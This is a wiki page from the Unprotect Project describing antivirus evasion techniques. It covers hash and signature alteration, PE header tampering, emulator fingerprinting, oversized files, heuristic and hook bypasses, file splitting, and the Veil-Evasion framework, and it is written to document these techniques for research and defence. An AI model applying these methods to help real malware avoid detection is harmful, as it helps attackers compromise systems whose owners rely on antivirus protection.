Antivirus Evasion

From Unprotect Project
Revision as of 16:57, 3 November 2016 by Admin (talk | contribs) (Technics)

Jump to: navigation, search

Technic Description

Anti-virus evasion are all the technics use by malware to evade detection by Anti-Virus. Antivirus evasion technics are used by malware writers, as well as by penetration testers and vulnerability researchers, in order to bypass one or more antivirus software applications. This ensures the payload the attacker wants to execute in the target machine or machines is not blocked by antivirus software and can perform the required actions.

Technics

Below is a list of all the AV evasion technics in Unprotect Project:

Anti-Virus Evasion Technics
Technics Description
Evading signature Hash calculation AV are able to detect if it's a known malware by calculating the file hash, by changing a simple bit into the binary allow the sample to evade hash detection.
Evading specific signature Some signatures are specifically designed to catch an exploit or a specific behaviour. By reversing the signature, it is possible to modify the malware to evade the signature. For example, by changing the size of the payload matching, or by changing the file's header.
PE format tricks Evading signature can also be performed by modifying the PE structure (changing section names, TimeDateStamp, MajorLinkerVersion/MinorLinkerVersion, Major/Minor OperatingSystemVersion and ImageVersion/MinorImageVersion, AddressOfEntryPoint, Maximum number of sections, File length.
Evading scanner Fingerprinting emulator Fingerprinting the AV emulator can allow the malware to detect the AV. For example, specific mutex can be used by the AV emulator, trying to detect it allow the sample to detect the AV.
Big file Because of the imposed file size limit, you can trick the scanner into skipping a file by changing the file’s size to make it larger than the hard-coded size limit. This file size limit applies especially with heuristic engines based on static data (data extracted from the portable executable, or PE, header)
Loading critical library for the OS Trying loading a critical library for the operating system, which is not supported by the emulator, and then calling an exported function. for example, trying to load the library will fail in almost any emulators.
File format confusion Confusing file format is another trick that can be used to bypass an AV detection specific to a file format.
Evading heuristic Bypassing static heuristic By looking the structure of the PE and the content of the file, the engine is able to detect if the file is malicious or not. Some AV can be easily fool by analysing it. For example, an heuristic engine can try to figure out if a file are using a dual extension (e.g: invoice.doc.exe) and determine the file as being malicious.
Bypassing dynamic heuristic Dynamic heuristic engines are implemented in the form of hooks (in user-land or kernel-land) or based on emulation. User-land hooks (HIPS) can be easily bypass by malware by patching back the entry point of the hooked function. For kernel-land hook, malware has to run in kernel space by installing a driver or abusing a kernel-level vulnerability.
File splitting An old trick consists to split the malicious file into different parts and analyse all of them separately with and AV. The chunk where the detection is still being triggered is actually the part of the file that need to change to evade the antivirus software you are targeting.
Veil-Evasion Veil-evasion is not a technic but it is an open source framework designed to evade AV by implementing different technics such as encryption, encoding, hyperion and others.

References